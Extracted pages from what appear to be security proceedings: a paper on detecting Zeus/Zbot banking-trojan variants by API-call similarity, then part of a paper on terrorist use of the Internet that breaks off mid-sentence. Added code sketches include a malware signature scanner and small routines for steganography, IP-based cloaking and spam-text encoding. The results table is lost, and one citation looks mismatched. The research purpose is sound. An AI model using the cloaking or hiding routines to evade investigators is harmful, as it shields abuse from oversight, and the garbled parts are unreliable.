Analyzing and detecting these obfuscated malicious executables is by itself a vast field.<br />
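As a minimal sketch of the string-signature scheme described above – a database of regular expressions applied by a matching engine – consider the following; the patterns here are invented for illustration and are not real antivirus signatures:<br />

```python
import re

# Hypothetical signature database: name -> byte-level regular expression.
# A real engine compiles thousands of such patterns into a single scan pass.
SIGNATURES = {
    "Zbot.gen":  re.compile(rb"\x55\x8b\xec.{0,16}\x68\x00\x30\x00\x00", re.DOTALL),
    "Vundo.gen": re.compile(rb"VirtuMonde|MS Juan"),
}

def scan(data):
    """Return the names of all signatures that match the file contents."""
    return [name for name, pattern in SIGNATURES.items() if pattern.search(data)]

print(scan(b"dropper with MS Juan marker"))  # -> ['Vundo.gen']
```

A polymorphic builder that re-obfuscates the binary on every use defeats exactly this kind of byte-pattern match, which motivates the behavioral similarity approach taken in this paper.<br />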
Our work is based on a collection of Zeus/Zbot variants gathered at Offensive Computing (Offensive Computing, 2010).<br />
As of today, Offensive Computing has one of the largest malware databases, which includes various kinds of executables such as spyware, adware, viruses, worms, and Trojans.<br />
Among the thousands of malware samples in the computing world, the number of unique executables is likely to be much lower, as many binaries differ only in their binary packing (Chen and Shi, 2008) and not in their functionality.<br />
In this paper we show how Zeus/Zbot variants can be detected effectively.<br />
In recent engagements we used this methodology to detect variants of Conficker, Zeus Crimeware, and data stealers that bypassed several popular antivirus tools, host-based security tools, and perimeter security devices.<br />
In this paper, we present an API call sequence approach to detecting Zeus samples. Our approach rests on the analysis of Windows API call sequences, applying distance measures to determine how similar the variants are.<br />
In summary, the main contribution of this paper is the effective detection of Zeus. In this introduction we have discussed a few lethal malware families and the importance of finding a good defensive mechanism.<br />
Next we describe the evolution of Zeus, followed by the results of reverse engineering it. In the subsequent sections we explain our method of analyzing Zeus, and finally we draw conclusions from our experiments, followed by the references.<br />
2. Evolution of Zeus/Zbot<br />
Zeus is a Trojan horse that steals banking information from infected machines and spreads through drive-by downloads and phishing emails.<br />
Its persistence is due to the large number of attackers using Zeus builders; these attackers pay thousands of dollars for the latest builders, which produce up-to-date, undetectable bot builds (Shevchenko, 2009).<br />
Every day new Zeus/Zbot samples are distributed, created by modifying the bots already in the wild or by layering all sorts of packers and encryption on top, with a few using custom-built packers.<br />
Before release, these samples are uploaded to multi-anti-virus scanners to make sure they are not detected by any anti-virus vendor.<br />
The worst aspect of Zeus/Zbot is that the latest generation of the bot uses rootkit techniques to hide its presence on the infected machine and injects additional fields into online Internet banking websites.<br />
The details entered there are collected and sent to remote systems, where they are later stored in a remote database. From this database the attacker uses the captured user credentials to transfer the desired amount to his account.<br />
In July 2007, Zeus was first found infecting the United States Department of Transportation, where it stole data from over 1000 PCs (Wikipedia, 2010), (Ragan, 2009).<br />
As of October 2009, 1.5 million phishing messages had been sent through Facebook. In November 2009, malicious spam emails purporting to be from Verizon Wireless were spreading Zeus (Moscaritolo, 2009).<br />
On October 1, 2010 a major cyber crime network was found to have hacked into US computers using Zeus and stolen around $70 million (Wikipedia, 2010). Since its discovery, gangs have netted more than $200 million (McMillan and Kirk, 2010).<br />
3. Reverse engineering Zeus/Zbot<br />
Zeus has been in the wild since 2006. Though its main methods of propagation are spam campaigns and drive-by downloads, its versatile nature means other vectors may also be utilized.<br />
The user may receive a masquerading email message appearing to come from a well-known organization such as the FDIC, IRS, Facebook or Microsoft.<br />
The message body warns the user about a financial problem and suggests visiting the link it provides. Once the user visits the link, the Trojan is downloaded and compromises the host machine.<br />
Based on the behavior of the executable (Qureshi), Zeus can be classified as a Trojan. Zeus propagates using drive-by downloads and phishing emails.<br />
It uses compromised FTP servers and peer-to-peer networks to spread, and unlike a worm, the end user has to initiate the download.<br />
Once Zeus is downloaded onto a computer, it installs itself and tries to connect to the botnet's command and control servers for further instructions. From the command and control servers it downloads configuration files and infects the browser.<br />
The malware then monitors browser activity and steals the appropriate data based on the encrypted information in the configuration file. Since it hooks into services like svchost to act as a man in the browser, it also shows characteristics of a virus.<br />
Figure 1 shows that the Trojan is packed using UPX, one of the most widely used packers, and Figure 2 shows its opcode instructions with the initial entry point.<br />
Figure 3 shows that the Trojan is packed and encrypted with the custom-made Zeus builder, and Figure 4 shows its opcode instructions.<br />
Figure 1: UPX packed Trojan<br />
Figure 2: Opcode instructions with entry points<br />
Figure 3: Trojan packed and encrypted with the custom made Zeus builder<br />
Figure 4: Opcode instructions with entry points for the Trojan with custom made Zeus builder<br />
According to our observations, though these two Trojans were created using different packers, their patterns of Windows API usage are almost identical.<br />
We observed the API call sequences of both Trojans, and when we applied distance measures after aligning their API sequences, we found that they are about 92.32% similar to each other.<br />
This shows that, irrespective of the obfuscation method used to create Zeus variants, our methodology can detect these Trojans.<br />
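The paper does not spell out the exact alignment and distance computation; one plausible sketch, scoring the longest common subsequence of two aligned API call sequences, is shown below. The two call sequences are hypothetical examples, not data from the paper:<br />

```python
def lcs_len(a, b):
    """Length of the longest common subsequence of two API call sequences
    (standard dynamic-programming formulation)."""
    m, n = len(a), len(b)
    dp = [[0] * (n + 1) for _ in range(m + 1)]
    for i in range(m):
        for j in range(n):
            dp[i + 1][j + 1] = dp[i][j] + 1 if a[i] == b[j] else max(dp[i][j + 1], dp[i + 1][j])
    return dp[m][n]

def similarity(a, b):
    """Percentage similarity: aligned calls relative to the longer sequence."""
    return 100.0 * lcs_len(a, b) / max(len(a), len(b))

# Hypothetical API call sequences from two differently packed samples.
upx_variant  = ["LoadLibraryA", "GetProcAddress", "VirtualAlloc", "CreateFileA", "WriteFile"]
zeus_builder = ["LoadLibraryA", "GetProcAddress", "VirtualAlloc", "RegOpenKeyA", "WriteFile"]
print("%.2f%% similar" % similarity(upx_variant, zeus_builder))  # -> 80.00% similar
```

Because packers change the bytes but not the run-time API behavior, a sequence-level score like this survives the obfuscation that defeats byte signatures.<br />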
4. Analysis methodology<br />
First, the Zeus sample is decompressed and passed through a PE file parser, producing an intermediate representation which consists of a Windows API calling sequence.<br />
This sequence is compared to a known malware sequence or signature (from the signature database) and is passed through the similarity measure module to generate the similarity report. The detection decision is made based on this report.<br />
The PE binary parser transforms the PE binary file into an API calling sequence using two components: W32Dasm version 8.9 and a text parser for the disassembled code.<br />
W32Dasm by URSoftware Co. is a commercial disassembler, which disassembles the PE code and outputs assembly instructions, imported modules, imported APIs, and resource information.<br />
The text parser parses the output from W32Dasm into a static API calling sequence, which becomes our signature.<br />
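A minimal sketch of the text-parser stage is given below. The disassembly line format is assumed for illustration and only approximates W32Dasm's real output; the module names in the pattern are a small sample chosen for the example:<br />

```python
import re

# Assumed W32Dasm-style disassembly line: ":address Call <MODULE>.<ApiName>"
CALL_RE = re.compile(r"Call\s+(?:KERNEL32|USER32|ADVAPI32|WININET)\.(\w+)", re.IGNORECASE)

def api_sequence(disassembly):
    """Extract the static API calling sequence, in order of appearance."""
    return CALL_RE.findall(disassembly)

listing = """
:00401000 Call KERNEL32.GetModuleHandleA
:00401010 mov eax, ebx
:00401015 Call ADVAPI32.RegOpenKeyExA
:00401020 Call WININET.InternetOpenA
"""
print(api_sequence(listing))  # -> ['GetModuleHandleA', 'RegOpenKeyExA', 'InternetOpenA']
```

The resulting ordered list of API names is the signature that the similarity measure module compares against the signature database.<br />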
Table 1: Similarity analysis of Zeus/Zbot compared among different variants<br />
(Table 1 is an n-by-n matrix of pairwise similarity percentages among the analyzed samples – among them Trojan.Spy.Zeus.1.Gen, Trojan.Spy.Zeus.2.Gen, Trojan.Zbot-85, Trojan.Broker-12, Trojan.Zbot-290, Trojan.Zbot-1151, Trojan.Zbot-1307, Trojan.Zbot-1342, Trojan.Zbot-1652, Trojan.Zbot-2163, Trojan.Zbot-2819, DHL_DOC, MemScan:Trojan.Spy.Zeus.C, GenTrojan.Heur.Zbot and ZeuS_binary samples – with 100.00 on the diagonal; the individual cell values did not survive extraction from the multi-page layout.)<br />
5. Similarity analysis results<br />
We apply the traditional similarity functions to Vs’ and Vu’. The cosine measure, the extended Jaccard measure, and the Pearson correlation measure are popular measures of similarity for sequences.<br />
Cosine similarity: Cosine similarity measures the similarity between two vectors of n dimensions by the angle between them, and captures a scale-invariant understanding of similarity:<br />
cos(Vs’, Vu’) = (Vs’ · Vu’) / (||Vs’|| ||Vu’||) (1)<br />
Extended Jaccard measure: The extended Jaccard coefficient measures the degree of overlap between two sets and is computed as the ratio of the number of attributes shared by Vs’ and Vu’ to the number possessed by Vs’ or Vu’:<br />
EJ(Vs’, Vu’) = (Vs’ · Vu’) / (||Vs’||² + ||Vu’||² − Vs’ · Vu’) (2)<br />
Pearson correlation: Correlation gives the linear relationship between two variables. For a series of n measurements of the variables Vs’ and Vu’, the Pearson correlation is<br />
r(Vs’, Vu’) = Σᵢ (Vs’ᵢ − mean(Vs’)) (Vu’ᵢ − mean(Vu’)) / (n · σVs’ · σVu’) (3)<br />
where Vs’ᵢ and Vu’ᵢ are the values of Vs’ and Vu’ respectively at position i, n is the number of measurements, σVs’ and σVu’ are the standard deviations of Vs’ and Vu’, and mean(Vs’) and mean(Vu’) are their means.<br />
In these experiments, we calculated the mean value of the three measures. For a particular measure m between virus signature i and a suspicious binary file, S(m)(Vs’i, Vu’) stands for the similarity between that signature and the file.<br />
Our similarity report is generated by calculating the S(m)(Vs’i, Vu’) value for each virus signature in the signature database.<br />
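Assuming Vs’ and Vu’ are numeric feature vectors (e.g., API call frequencies), the three measures and their mean can be sketched as follows; the function names are illustrative, not the paper's implementation:<br />

```python
import math

def cosine(u, v):
    """Cosine measure: dot product over the product of vector norms."""
    dot = sum(a * b for a, b in zip(u, v))
    return dot / (math.sqrt(sum(a * a for a in u)) * math.sqrt(sum(b * b for b in v)))

def extended_jaccard(u, v):
    """Extended Jaccard: shared magnitude over combined magnitude."""
    dot = sum(a * b for a, b in zip(u, v))
    return dot / (sum(a * a for a in u) + sum(b * b for b in v) - dot)

def pearson(u, v):
    """Pearson correlation with population standard deviations."""
    n = len(u)
    mu, mv = sum(u) / n, sum(v) / n
    su = math.sqrt(sum((a - mu) ** 2 for a in u) / n)
    sv = math.sqrt(sum((b - mv) ** 2 for b in v) / n)
    return sum((a - mu) * (b - mv) for a, b in zip(u, v)) / (n * su * sv)

def mean_similarity(u, v):
    """Mean of the three measures, as used for the similarity report."""
    return (cosine(u, v) + extended_jaccard(u, v) + pearson(u, v)) / 3.0
```

In the reported experiments, this mean score is computed against every signature in the database to build the similarity report.<br />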
In this experiment, we compared Zeus/Zbot variants against each other, creating an n-by-n matrix which shows how similar the variants are. Table 1 shows the similarity values of Zeus/Zbot variants compared among themselves.<br />
From Table 1 we can infer that variants of Zeus/Zbot are highly similar in the sequence in which the Windows APIs are called.<br />
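The pairwise comparison behind such a matrix can be sketched as follows; the variant names and frequency vectors below are toy values for illustration, not the paper's data:<br />

```python
def similarity_matrix(signatures, measure):
    """Pairwise n-by-n matrix of similarity scores; the diagonal is the self-match."""
    names = list(signatures)
    return {a: {b: measure(signatures[a], signatures[b]) for b in names} for a in names}

def cosine(u, v):
    """Cosine measure used as the pairwise score."""
    dot = sum(a * b for a, b in zip(u, v))
    norm = lambda w: sum(x * x for x in w) ** 0.5
    return dot / (norm(u) * norm(v))

# Toy API-frequency vectors for three hypothetical variants.
variants = {
    "Zbot-85":   [4, 2, 0, 1],
    "Zbot-1342": [4, 1, 0, 1],
    "Broker-12": [0, 3, 5, 0],
}

matrix = similarity_matrix(variants, cosine)
```

Two Zbot builds score close to 1.0 against each other, while the unrelated sample scores much lower – the same pattern the full 40-variant matrix in Table 1 exhibits.<br />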
6. Conclusion<br />
In this paper, we presented an approach to malware detection based on Windows API call sequences. According to our observations, though there has been a tremendous increase in Zeus/Zbot variant builders, the API call behavior of the variants remains almost the same.<br />
Thus our approach can detect Zeus variants robustly and efficiently. Experimental results show that our method is able to quantify how similar these variants are, even though they have evaded present virus defense systems, and how accurately Zeus/Zbot variants can be detected.<br />
References<br />
Bell, Henry and Chien, Eric. (2010) Trojan.Vundo, Symantec Technical Report [online], 17 Mar, Available:<br />
http://www.symantec.com/security_response/writeup.jsp?docid=2004-112111-3912-99 [12 Sep 2010].<br />
Chen, C. and Shi, Y. Q. (2008) “JPEG image steganalysis utilizing both intrablock and interblock correlations”,<br />
IEEE International Symposium on Circuits and Systems, Seattle, WA, 18-21 May.<br />
Cooke, E., Jahanian, F. and McPherson, D. (2006) “The zombie roundup: Understanding, detecting, and<br />
disrupting botnets”, in Usenix Workshop on Steps to Reducing Unwanted Traffic on the Internet (SRUTI).<br />
Freiling, F., Holz, T. and Wicherski, G. (2005) “Botnet Tracking: Exploring a Root-Cause Methodology to Prevent<br />
Distributed Denial-of-Service Attacks”, in <strong>European</strong> Symposium on Research in Computer Security<br />
(ESORICS).<br />
Fridrich, J. (2004) "Feature-based steganalysis for JPEG images and its implications for future design of<br />
steganographic schemes", in Information Hiding, <strong>6th</strong> International Workshop, LNCS 3200, pp. 67-81.<br />
Holz, T., Engelberth, M. and Freiling, F. (2008) Learning More About the Underground Economy: A Case-Study<br />
of Keyloggers and Dropzones, ReiheInformatik TR-2008-006, University of Mannheim.<br />
Terrorist use of the Internet: Exploitation and Support<br />
Through ICT Infrastructure<br />
Namosha Veerasamy and Marthie Grobler<br />
Council for Scientific and Industrial Research, Pretoria, South Africa<br />
nveerasamy@csir.co.za<br />
mgrobler1@csir.co.za<br />
Abstract: The growth of technology has provided a wealth of functionality. One area in which Information<br />
Communication Technology (ICT), especially the Internet, has grown to play a supporting role is terrorism. The<br />
Internet provides an enormous amount of information, and enables relatively cheap and instant communication<br />
across the globe. As a result, the conventional view of many traditional terrorist groups shifted to embrace the<br />
use of technology within their functions. The goal of this paper is to present the functions and methods that<br />
terrorists have come to rely on through the ICT infrastructure. The discussion sheds light on the technical and<br />
practical role that ICT infrastructure plays in the assistance of terrorism. The use of the Internet by terrorist<br />
groups has expanded from traditional Internet usage to more innovative usage of both traditional and new<br />
Internet functions. Global terrorist groups can now electronically target an enormous number of potential<br />
recipients, recruits and enemies. The aim of the paper is to show how the Internet can be used to enable<br />
terrorism, as well as provide technical examples of the support functionality and exploitation. This paper<br />
summarises the high-level functions, methods and examples for which terrorists utilise the Internet. This paper<br />
looks at the use of the Internet as both a uni-directional and bi-directional tool to support functionality like<br />
recruitment, propaganda, training, funding and operations. It also discusses specific methods like the<br />
dissemination of web literature, social-networking tools, anti-forensics and fund-raising schemes. Additional<br />
examples, such as cloaking and coding techniques, are also provided. In order to analyse how ICT infrastructure<br />
can be used in the support of terrorism, a mapping is given of communication direction to the traditional Internet<br />
use functions and methods, as well as to innovative Internet functions and methods.<br />
Keywords: anti-forensics, internet, terrorism, ICT, propaganda, social-networking<br />
1. Introduction<br />
According to the Internet World Stats webpage, the number of world Internet users (calculated on<br />
30 June 2010) was 1 966 541 816, representing a 28.7% penetration of the world population (2010).<br />
Although this does not reflect a majority of the world population, it presents an enormous number of<br />
potential recipients, recruits and enemies that global terrorist groups can target electronically.<br />
However, terrorist groups’ embrace of technology was once an uncommon phenomenon.<br />
In the book The Secret History of al Qaeda, an eyewitness to the al Qaeda men fleeing United States<br />
bombardments of their training camps in November 2001 is quoted: "Every second al Qaeda<br />
member [was] carrying a laptop computer along with his Kalashnikov" (Atwan 2006). This scenario is<br />
highly paradoxical: an organisation utterly opposed to the modern world, such as al Qaeda, is<br />
increasingly relying on the hi-tech electronic facilities offered by the Internet to operate, expand, develop<br />
and survive. In the early 1980s especially, some groups in Afghanistan were opposed to using any<br />
kind of technology of largely Western origin or innovation (Atwan 2006).<br />
However, the world has changed. Technology has been introduced into most aspects of daily life, and<br />
the Internet has become a prominent component of business and private life. It provides an enormous<br />
amount of information and enables relatively cheap and instant communication across the globe. As a<br />
result, the view of many traditional terrorist groups has shifted to embrace the use of technology<br />
within their functions. In 2003, a document titled 'al Qaeda: The 39 principles of Jihad' was published<br />
on the al-Farouq website. Principle 34 states that 'performing electronic jihad' is a 'sacred duty'. The<br />
author of the principle document calls upon the group's members to participate actively in Internet<br />
forums. He explains that the Internet offers the opportunity to respond instantly and to reach millions<br />
of people in seconds. Members who have Internet skills are urged to use them to support the jihad by<br />
hacking into and destroying enemy websites (Atwan 2006).<br />
Keeping this principle in mind, the use of the Internet by terrorist groups has expanded from only<br />
traditional Internet usage to more innovative usage of both traditional and new Internet functions. This<br />
paper will summarise the high-level functions, methods and examples for which terrorists utilise the<br />
Internet. The examples and methods often provide for various functions and thus a strict one-to-one<br />
mapping cannot be provided. Rather, the examples given shed light on the technical and practical role<br />
that ICT infrastructure plays in the support of terrorism.<br />
2. Functionality of the internet<br />
Terrorists use the Internet because it is easy and inexpensive to disseminate information<br />
instantaneously worldwide (Piper 2008). By its very nature, the Internet is in many ways an ideal<br />
arena for activity by terrorist groups. The Internet offers little or no regulation, is an anonymous<br />
multimedia environment, and has the ability to shape coverage in the traditional mass media<br />
(Weimann 2005).<br />
Whilst the Internet was originally created to facilitate communication between two computers, its<br />
functionality now extends to serving as an information repository as well. Figure 1 shows the general functions that<br />
terrorists may use the Internet for, with an indication of which types of methods are used for each<br />
functionality type.<br />
Recruitment – the process of attracting, screening and selecting individuals to become members<br />
of the terrorist groups; both web literature and social networking tools can be applied for this<br />
purpose.<br />
Training – the process of disseminating knowledge, skills and competency to new recruits with<br />
regard to specific topics of knowledge that may be needed during terrorist operations; social<br />
networking tools and anti-forensics methods are employed for this purpose.<br />
Communication – the process of conveying information to members of the terrorist group; social<br />
networking tools and anti-forensics methods are employed for this purpose.<br />
Operations – the direction and control of a specific terrorist attack; web literature, anti-forensics<br />
and fundraising methods are employed for this purpose.<br />
Propaganda – a form of communication aimed at influencing the terrorist community toward a<br />
specific cause; both web literature and social networking tools can be applied for this purpose.<br />
Funding – financial support provided to make a specific terrorist operation possible; fundraising<br />
methods are used for this purpose.<br />
Psychological warfare – the process of spreading disinformation in an attempt to deliver threats<br />
intended to instil fear and helplessness within the enemy ranks; both web literature and social<br />
networking tools can be applied for this purpose.<br />
The Internet is the perfect tool to exploit in order to support terrorist activities. Not only does it provide<br />
location independence, speed, anonymity and internationality, but it also provides a relatively low<br />
cost-benefit ratio (Brunst 2010), making it a desirable tool. Figure 1 shows the complexity of terrorist<br />
groups' use of the Internet (as both a traditional communication and an information gathering tool) in<br />
innovative new ways. The Internet is also used as both a uni-directional and a bi-directional<br />
communication tool.<br />
Although this list of functionalities is not exhaustive, it provides a better understanding of the need for<br />
specific methods to exploit the ICT infrastructure to support terrorist activities. The next section<br />
discusses the methods in more detail, and explains these with actual examples.<br />
3. Exploiting the ICT infrastructure to support terrorist activities<br />
For the purpose of this article, Internet exploitation methods are divided into four distinct groups: web<br />
literature, social networking tools, anti-forensics and fundraising. Figure 2 shows these groups with<br />
some examples of how the methods may be employed.<br />
3.1 Web literature<br />
Web literature refers to all writings published on the web in a particular style on a particular subject.<br />
Some of the types of web literature facilitated by terrorist groups include published periodicals and<br />
essays, manuals, encyclopaedias, poetry, videos, statements and biographies. Since web literature<br />
often takes the form of mass uni-directional communication, this medium is ideal for terrorist use in<br />
recruitment, operations, training and propaganda.<br />
Figure 1: The Internet as terrorist supporting mechanism<br />
Figure 2: Examples of how terrorists may use the Internet<br />
Radio Free Europe/Radio Liberty compiled a special report on the use of media by Sunni insurgents<br />
in Iraq and their supporters worldwide. This report discusses the products produced by terrorist media<br />
campaigns, including text, audiovisual media and websites (Kimmage, Ridolfo 2007). The distribution of text<br />
and audiovisual media is a traditional use of the Internet, with little innovative application. Text media<br />
include press releases, operational statements, inspirational texts and martyr biographies. Audiovisual<br />
media include recordings of al Qaeda operations in Iraq (Atwan 2006). Online training material can<br />
provide detailed instructions on how to make letter bombs; use poison and chemicals; detonate car<br />
bombs; shoot US soldiers; navigate by the stars (Coll, Glasser 2005) and assemble a suicide bomb<br />
vest (Lachow, Richardson 2007).<br />
The use of dedicated websites within terrorist circles is prominent. By the end of 1999, most of the 30<br />
organisations designated as Foreign Terrorist Organisations maintained a web presence<br />
(Weimann 2009). By 2006, this number had grown to over 5000 active websites (Nordeste, Carment<br />
2006). These websites generally provide current activity reports and vision and mission statements of<br />
the terrorist group. Sympathetic websites focus largely on propaganda. These websites have postings<br />
of entire downloadable books and pamphlet libraries aimed at indoctrinating jihadi sympathizers and<br />
reassuring already indoctrinated jihadists (Jamestown Foundation 2006). Pro-insurgent websites focus<br />
on providing detailed tutorials to group members, e.g. showing how to add news crawls that provide<br />
the latest, fraudulent death toll for US forces in Iraq.<br />
According to an al Qaeda training manual, it is possible to gather at least 80% of all information<br />
required about the enemy by using public Internet sources openly and without resorting to illegal<br />
means (Weimann 2005). More than 1 million pages of historical government documents have been<br />
removed from public view since the 9/11 terror attacks. This record of concern program aims to<br />
"reduce the risk of providing access to materials that might support terrorists". Among the removed<br />
documents is a database from the Federal Emergency Management Agency with information about all<br />
federal facilities, and 200 000 pages of naval facility plans and blueprints. The data is removed from<br />
the public domain, but individuals can still request to see parts of the withdrawn documents under the<br />
Freedom of Information Act (Bass, Ho 2007).<br />
Other examples of web literature and information collected through the Internet include maps, satellite<br />
photos of potential attack sites, transportation routes, power and communication grids, infrastructure<br />
details, pipeline systems, dams and water supplies, information on natural resources and email<br />
distribution lists. Although this type of information may not necessarily be useful in cyberterrorism<br />
activities, it can be used to plan traditional terrorism activities without actually going to the<br />
geographical location of the target. Some terrorist groups have recently been distributing flight<br />
simulation software. Web literature can thus be used in the initial recruitment campaigns by glorifying<br />
terrorism through inspirational media, as well as the training of members, propaganda and the<br />
operations of the terrorist group.<br />
3.2 Social networking tools<br />
Social networking tools focus on building and reflecting social networks or social relations among<br />
people who share a common interest. Some types of social networking tools facilitated by terrorist<br />
groups include online forums and blogs, websites, games, virtual personas, music and specialised<br />
applications. Social networking tools offer both uni-directional and bi-directional communications, and<br />
can be used for recruitment, training, propaganda and communication within terrorist groups.<br />
Social networking and gaming sites often require new members to create accounts by specifying their<br />
names, skills and interests. Through the creation of these virtual personas, terrorist groups are able to<br />
gather information on potential recruits. Individuals with strong technical skills in the fields of<br />
chemistry, engineering or weapons development can be identified and encouraged to join the group.<br />
This type of information can be derived from interactions in social networking sites, forums and blogs<br />
where users share information about their interests, beliefs, skills and careers. Online gaming sites<br />
also provide a source of potential members. For example, terrorist groups identify online players with<br />
a strong shooting ability that might be indicative of violent tendencies. In some terrorist groups, this<br />
type of temperament would be ideal for operational missions.<br />
In addition to traditional social networking sites like Facebook and MySpace, Web 2.0 technologies<br />
evolved to customisable social networking sites. West and Latham (2010) state that social networking<br />
creation sites are an online extremist's dream: they are inexpensive, easy to use, highly customisable and<br />
conducive to online extremism. Ning users, for example, can create an individualised site where users<br />
have the ability to upload audio and video files, post and receive messages and blog entries, create<br />
events and receive RSS feeds. If a terrorist group sets up a customised social site, they would have<br />
the ability to control access to members, post propaganda videos and even use the site for<br />
fundraising.<br />
Another way of promoting a cause is with music (Whelpton 2009). Islamist and white supremacist groups<br />
perform captivating songs with pop and hip-hop beats that often attract young, impressionable teenagers.<br />
The lyrics of the music promote the cause and the catchy beats keep the youth captivated.<br />
Other examples of social networking include chat rooms, bulletin boards, discussion groups and micro<br />
blogging (such as Twitter). The type of social networking used by terrorist groups depends on the<br />
group’s infrastructure, ability and personal preference. For example, al Qaeda operatives use the<br />
Internet in public places and communicate by using free web based email accounts. For these public<br />
types of communication, instructions are often delivered electronically through code, usually in<br />
difficult-to-decipher dialects for which Western intelligence and security services have few or no<br />
trained linguists (Nordeste, Carment 2006).<br />
3.3 Anti-forensics<br />
Anti-forensics is a set of tools or methods used to counter the use of forensic tools and methods.<br />
Some of the identified types of anti-forensic measures include steganography, dead dropping,<br />
encryption, IP-based cloaking, proxies and anonymising. Since anti-forensic measures mostly offer<br />
targeted uni-directional communication, they are ideal for training, operations and communication within<br />
terrorist groups.<br />
Steganography is a method of covertly hiding one message within another. This is done by embedding<br />
the true message within a seemingly innocuous communication, such as text, image or audio. Only<br />
individuals who know of the hidden message and have the relevant key will be able to extract the<br />
original message from the carrier message. The password or passphrase is delivered to the intended<br />
recipient by secure alternative means (Lau 2003). Although it is difficult to detect the modified carrier<br />
media visually, it is possible to use statistical analysis. The February 2007 edition of Technical<br />
Mujahid contains an article that encourages extremists to download a copy of the encryption program<br />
“Secrets of the Mujahideen” from the Internet (2007). The program hid data in the pixels of the image<br />
and compressed the file to defeat steganalysis attempts.<br />
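The embedding principle described above can be illustrated with a minimal sketch. The following is a toy least-significant-bit scheme over raw pixel bytes, not a reconstruction of any tool named in this paper; the function names and the use of a plain bytearray as carrier are assumptions made purely for illustration.<br />

```python
def embed(carrier: bytearray, message: bytes) -> bytearray:
    """Hide each bit of `message` in the least significant bit of one carrier byte."""
    bits = [(byte >> i) & 1 for byte in message for i in range(7, -1, -1)]
    if len(bits) > len(carrier):
        raise ValueError("carrier too small for message")
    stego = bytearray(carrier)
    for i, bit in enumerate(bits):
        stego[i] = (stego[i] & 0xFE) | bit  # change at most the lowest bit
    return stego

def extract(stego: bytearray, length: int) -> bytes:
    """Read back `length` hidden bytes from the stego carrier."""
    out = bytearray()
    for i in range(length):
        byte = 0
        for j in range(8):
            byte = (byte << 1) | (stego[i * 8 + j] & 1)
        out.append(byte)
    return bytes(out)
```

Because only the lowest bit of each carrier byte changes, the modified image is visually indistinguishable from the original, which is precisely why detection relies on statistical analysis rather than inspection.<br />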
Another technique that would bypass messaging interception techniques is the use of virtual dead<br />
dropping, or draft message folders. Bruce Hoffman from Rand Corp. (in Noguchi, Goo 2006) states<br />
that terrorists create free web based email accounts and allow others to log into the accounts and<br />
read the drafts without the messages ever being sent. The email account name and password are<br />
transmitted in code in a chat forum or secure message board to the intended recipients. This<br />
technique is used especially for highly sensitive information (Nordeste, Carment 2006) and where<br />
electronic interception legislation may come into play.<br />
Redirecting of traffic through IP-based cloaking is another anti-forensic technique. At a seminar in<br />
FOSE 2006, Cottrell (in Carr 2007) stated that: “When the Web server receives a page request, a<br />
script checks the IP address of the user against a list of known government IP addresses. If a match<br />
is found, the server delivers a Web page with fake information. If no match is found, the requesting<br />
user is sent to a Web page with real information”. From this comes the expression 'cloaking', as the authentic<br />
site is masked. This leads to a similar technique called IP-based blocking, which prevents users’<br />
access to a site instead of redirecting the traffic.<br />
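The cloaking logic Cottrell describes can be sketched in a few lines. This is a hypothetical illustration of the quoted behaviour, not code from any real site; the network ranges below are RFC 5737 documentation addresses standing in for a "known government IP" list.<br />

```python
import ipaddress

# Hypothetical list of address ranges the site operator attributes to
# investigators (RFC 5737 documentation ranges used as stand-ins).
FLAGGED_NETWORKS = [ipaddress.ip_network(n)
                    for n in ("192.0.2.0/24", "198.51.100.0/24")]

REAL_PAGE = "<html>actual content</html>"
DECOY_PAGE = "<html>innocuous cover page</html>"

def serve(client_ip: str) -> str:
    """Return the decoy page for flagged addresses and the real page otherwise."""
    addr = ipaddress.ip_address(client_ip)
    if any(addr in net for net in FLAGGED_NETWORKS):
        return DECOY_PAGE
    return REAL_PAGE
```

IP-based blocking, mentioned above, differs only in the final step: the flagged branch would refuse the connection instead of returning a decoy page.<br />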
Other techniques include the use of a proxy and secure channel to hide Internet activity. The Search<br />
for International Terrorist Entities Institute (SITE) detected a posting that encouraged the use of a<br />
proxy as it erases digital footprints such as web addresses and other identifiable information (Noguchi,<br />
Goo 2006). The premise of this approach is that the user connects to a proxy that requests an<br />
anonymising site to redirect the user to the target site. The connection to the proxy is via a secure<br />
encrypted channel that hides the originating user’s details. The well-known cyber user Irhabi 007<br />
(Terrorist 007) also provided security tips by distributing anonymising software that masks an IP<br />
address (Labi 2006).<br />
Another innovative use of the Internet is provided by spammimic.com. Spam (unsolicited distribution<br />
of mass email communication) has become a nuisance for the average netizen. Most people<br />
automatically delete these messages or send them to the spam folder. Spammimic.com provides an<br />
interesting analogue of encryption software that hides messages within the text of ordinary mail. It<br />
does not provide true encryption, but hides the text of a short message within what appears to be an<br />
average spam mail. Not only are the messages disguised, but few people will take the chance of<br />
opening the email for fear of attached malware. Thus, only the intended recipients will know about the<br />
disguised messages and decode them through the web interface (Tibbetts 2002).<br />
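The idea can be illustrated with a toy encoder that maps each bit of a short message to a choice between two interchangeable spam phrases. The phrase table below is invented for illustration and is unrelated to the actual spammimic.com implementation.<br />

```python
# One pair of interchangeable spam phrases per bit position (used cyclically);
# choosing the first phrase encodes a 0, the second a 1. This is an encoding,
# not encryption: anyone holding the phrase table can decode the mail.
PHRASES = [("Act now!", "Don't delay!"),
           ("Limited offer.", "Exclusive deal."),
           ("100% free.", "No cost to you."),
           ("Click here.", "Visit our site.")]

def encode(message: bytes) -> str:
    bits = [(b >> i) & 1 for b in message for i in range(7, -1, -1)]
    return " ".join(PHRASES[i % len(PHRASES)][bit] for i, bit in enumerate(bits))

def decode(spam: str) -> bytes:
    bits, i, pos = [], 0, 0
    while pos < len(spam):
        zero, one = PHRASES[i % len(PHRASES)]
        if spam.startswith(zero, pos):
            bits.append(0)
            pos += len(zero) + 1  # phrase plus the separating space
        elif spam.startswith(one, pos):
            bits.append(1)
            pos += len(one) + 1
        else:
            raise ValueError("not a valid cover text")
        i += 1
    out = bytearray()
    for j in range(0, len(bits), 8):
        byte = 0
        for bit in bits[j:j + 8]:
            byte = (byte << 1) | bit
        out.append(byte)
    return bytes(out)
```

The resulting text reads like ordinary junk mail, so it attracts no attention in transit, yet any recipient holding the same phrase table can recover the message exactly.<br />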
3.4 Fundraising<br />
Fundraising is the process of soliciting and gathering contributions by requesting donations, often in<br />
the form of money. Some of the identified types of fundraising methods include donations,<br />
auctioneering, casinos, credit card theft, drug trafficking and phishing. Since fundraising methods<br />
mostly offer targeted communication, they can be used for operations and funding activities.<br />
Since the 9/11 terrorist attack, terrorist groups have increasingly relied on the Internet for finance<br />
related activities. Popular terrorist organisation websites often have links such as “What You Can Do”<br />
or “How Can I Help”. Terrorist websites publish requests for funds by appealing to sympathetic users<br />
